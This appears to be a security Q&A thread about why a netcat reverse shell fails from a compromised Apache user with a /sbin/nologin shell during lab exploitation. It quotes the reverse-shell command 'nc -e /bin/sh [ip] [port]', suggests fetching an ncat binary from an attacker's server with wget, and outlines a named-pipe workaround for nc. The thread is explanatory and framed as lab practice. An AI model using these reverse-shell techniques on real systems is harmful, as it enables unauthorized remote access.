0

While practicing exploitation on a lab, I managed to get the ability to execute php code which allowed me to execute system commands through shell_exec on a web server. The apache user has /sbin/nologin assigned as its shell.
I have tried using the command nc -e /bin/sh [ip] [port] but it fails. Using netcat without starting a shell, however, succeeds. I assumed that this was because having the shell set to /no/login means I cannot start it. However, if I use an executable that performs execve("/bin/sh") such as those found in msfvenom payload executables, it succeeds.

Another reason I assumed the nologin shell disallows a user to start an interactive shell is because trying the netcat reverse shell with a user who has /bin/sh configured as its shell succeeds. I am confused what phase checking for permissions to start a shell begins because I am still able to start it through binary executables.

chicks
  • 145
  • 1
  • 6
MykelXIII
  • 103
  • 5
  • 2
    /sbin/nologin forbids console/ssh logins, but if you get access through an exploit, you can still run /bin/sh. It may be that nc on this box doesn't allow -e. There is a tty trick to do it anyway (can't find it just now). Alternatively, use wget to fetch a ncat static binary from your own web server. – paj28 Jul 31 '16 at 11:43

1 Answers1

0

Most probably, your problem has nothing to do with the login shell. Having a version of nc that supports the -e option is a great exception. Most netcats don't support -e. This article explains what you have to do in this case. You have to split the shell creation into 2 parts, first you create a pipe with

mknod /tmp/mypipe p

and then you create the shell by redirecting stdin and stdout to the pipe and thereby to nc.

kaidentity
  • 2,634
  • 13
  • 30